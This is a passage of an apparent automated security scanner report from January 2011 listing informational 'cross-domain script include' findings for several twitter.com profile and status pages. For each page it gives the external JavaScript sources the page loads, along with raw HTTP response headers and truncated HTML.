Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzUwOTA1NDUyMjA0MDMyOgxjc3JmX2lkIiVkODZk%250AMjcyMjlhNTEzMTJlNGRlNDE2YTAwZDEyZWE0NzoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsA--7730b0835aca73fbfa7584451a530b004e00e740; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.346. http://twitter.com/Michael_Joseph/status/30750905452204032 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Michael_Joseph/status/30750905452204032

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224914-94525-23113
ETag: "83bfba4b5292333b01c60b5cd56ed6f4"
Last-Modified: Fri, 28 Jan 2011 14:28:34 GMT
X-Runtime: 0.04125
Content-Type: text/html; charset=utf-8
Content-Length: 13962
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzUwOTA1NDUyMjA0MDMyOgxjc3JmX2lkIiU2NGIz%250AM2Q5ODM3OTJkMzdhM2NmN2MyMTM0MTQwMWI1YjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--541977a9c3c5e1a5a3320c2e55e9133173473f96; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.347. http://twitter.com/Michael_Joseph/status/30790097846673409 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Michael_Joseph/status/30790097846673409

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225122-5733-7148
ETag: "d9d2e6dcd4d80c4ffb43dbbb3bd38df8"
Last-Modified: Fri, 28 Jan 2011 14:32:02 GMT
X-Runtime: 0.06399
Content-Type: text/html; charset=utf-8
Content-Length: 14048
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzkwMDk3ODQ2NjczNDA5Ogxjc3JmX2lkIiUxNmQw%250AYTUyZDkwZTIxNjg3ZDFjNzAxMmIyMTMzZjAyYzoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--1717b69e386408623023239f5727e6426422dbd2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.348. http://twitter.com/Michael_Joseph/status/30790097846673409 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Michael_Joseph/status/30790097846673409

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224913-82080-4832
ETag: "f4090043902b6e990964220437113fcc"
Last-Modified: Fri, 28 Jan 2011 14:28:33 GMT
X-Runtime: 0.05956
Content-Type: text/html; charset=utf-8
Content-Length: 14049
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzkwMDk3ODQ2NjczNDA5Ogxjc3JmX2lkIiU0ZTYz%250AMTFjMGI1MGExOTQ1ZDU1ZTJiMzY3YmViYjhmZDoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--3f3d222c37991f7c56cd273e7db3127271465e45; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.349. http://twitter.com/MittRomney previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/MittRomney

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-38547-52668
ETag: "3107c6cc6c6978ff3b7722cbf52c2af6"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00731
Content-Type: text/html; charset=utf-8
Content-Length: 46527
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.350. http://twitter.com/NewYorkPost previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/NewYorkPost

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265993-27588-50087
ETag: "e773df2d3a6b90bf31143c56a9f20c5d"
Last-Modified: Sat, 29 Jan 2011 01:53:13 GMT
X-Runtime: 0.01729
Content-Type: text/html; charset=utf-8
Content-Length: 53629
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.351. http://twitter.com/Nicole_114 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Nicole_114

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-31870-20101
ETag: "259b5389cc01f15bd18d06cca5332bd4"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01243
Content-Type: text/html; charset=utf-8
Content-Length: 47429
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.352. http://twitter.com/Oprah previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Oprah

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266030-46156-5686
ETag: "857c98a5094f6af87e0d30eae77b7c6f"
Last-Modified: Sat, 29 Jan 2011 01:53:50 GMT
X-Runtime: 0.01844
Content-Type: text/html; charset=utf-8
Content-Length: 42735
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.353. http://twitter.com/PageLines previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/PageLines

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:04 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225004-17515-51236
ETag: "24c45e2f38e6ae478c4805af9b36ff8e"
Last-Modified: Fri, 28 Jan 2011 14:30:04 GMT
X-Runtime: 0.01227
Content-Type: text/html; charset=utf-8
Content-Length: 51190
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.354. http://twitter.com/PageLines/status/27898822361354240 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/PageLines/status/27898822361354240

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
